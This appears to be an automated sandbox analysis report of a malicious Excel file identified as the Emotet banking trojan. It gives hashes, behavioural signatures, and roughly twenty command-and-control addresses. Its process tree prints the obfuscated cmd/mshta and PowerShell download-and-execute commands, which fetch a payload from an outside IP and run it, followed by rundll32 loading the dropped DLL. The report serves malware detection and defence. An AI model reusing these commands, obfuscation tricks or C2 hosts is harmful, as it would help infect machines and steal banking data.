Overview

overview

10

Static

static

8

22024c28d9...02.xls

windows7_x64

10

22024c28d9...02.xls

windows10-2004_x64

10

Analysis

  • max time kernel
    130s
  • max time network
    134s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    18-01-2022 16:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    22024c28d98a0aa62558650d4be96202.xls

  • Size

    128KB

  • MD5

    22024c28d98a0aa62558650d4be96202

  • SHA1

    2b145417423113d71bf9c988de67ebc2ded75471

  • SHA256

    e6a55d3065b29b2634244c18d442d767860dde8b31b384e78ffa5a532f690a08

  • SHA512

    6cf1ea3a5a151a833fbf9d5831d80583a15509183dc134b495cd26c41562bd2a8b159b170851a6f04c846592da00885ea93d4b58240d3f4db9f61285fcf84238

Score
10/10
emotetepoch4bankertrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/cc.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/PP91.PNG

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080
eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\22024c28d98a0aa62558650d4be96202.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:544
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/c^c.h^tm^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\system32\mshta.exe
        mshta http://0xb907d607/cc.html
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1512
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:460
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1756
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:2932
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Httneqqg\kwqfauvq.gbt",TSmZDjvNp
                  8⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1888
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Httneqqg\kwqfauvq.gbt",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    PID:1688
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1336 -s 1724
          4⤵
          • Program crash
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:1916
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 428 -p 1336 -ip 1336
    1⤵
    • Suspicious use of NtCreateProcessExOtherParentProcess
    • Suspicious use of WriteProcessMemory
    PID:1692

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/544-134-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-138-0x00007FFFB9E10000-0x00007FFFB9E20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-234-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-233-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-130-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-232-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-231-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-137-0x00007FFFB9E10000-0x00007FFFB9E20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-133-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-132-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/544-131-0x00007FFFBC610000-0x00007FFFBC620000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1512-170-0x0000013E3BFF0000-0x0000013E54100000-memory.dmp

    Filesize

    385.1MB

    Download

  • memory/1512-191-0x0000013E54670000-0x0000013E546E6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/1512-167-0x0000013E54100000-0x0000013E54122000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1512-169-0x0000013E3BFF0000-0x0000013E54100000-memory.dmp

    Filesize

    385.1MB

    Download

  • memory/1512-172-0x0000013E3BFF0000-0x0000013E54100000-memory.dmp

    Filesize

    385.1MB

    Download

  • memory/1512-173-0x0000013E54620000-0x0000013E54664000-memory.dmp

    Filesize

    272KB

    Download

  • memory/1688-216-0x00000000045E0000-0x0000000004606000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1688-239-0x0000000004F60000-0x0000000004F86000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1688-245-0x0000000005270000-0x0000000005296000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1688-243-0x0000000005190000-0x00000000051B6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1688-223-0x00000000046D0000-0x00000000046F6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1688-241-0x0000000005060000-0x0000000005086000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1688-237-0x0000000004E80000-0x0000000004EA6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1756-186-0x0000000004D40000-0x0000000004D66000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1888-203-0x00000000040D0000-0x00000000040F6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2932-196-0x00000000052E0000-0x0000000005306000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2932-192-0x0000000004BC0000-0x0000000004BE6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2932-198-0x0000000005340000-0x0000000005366000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2932-202-0x00000000055A0000-0x00000000055C6000-memory.dmp

    Filesize

    152KB

    Download

  • memory/2932-189-0x0000000004A30000-0x0000000004A56000-memory.dmp

    Filesize

    152KB

    Download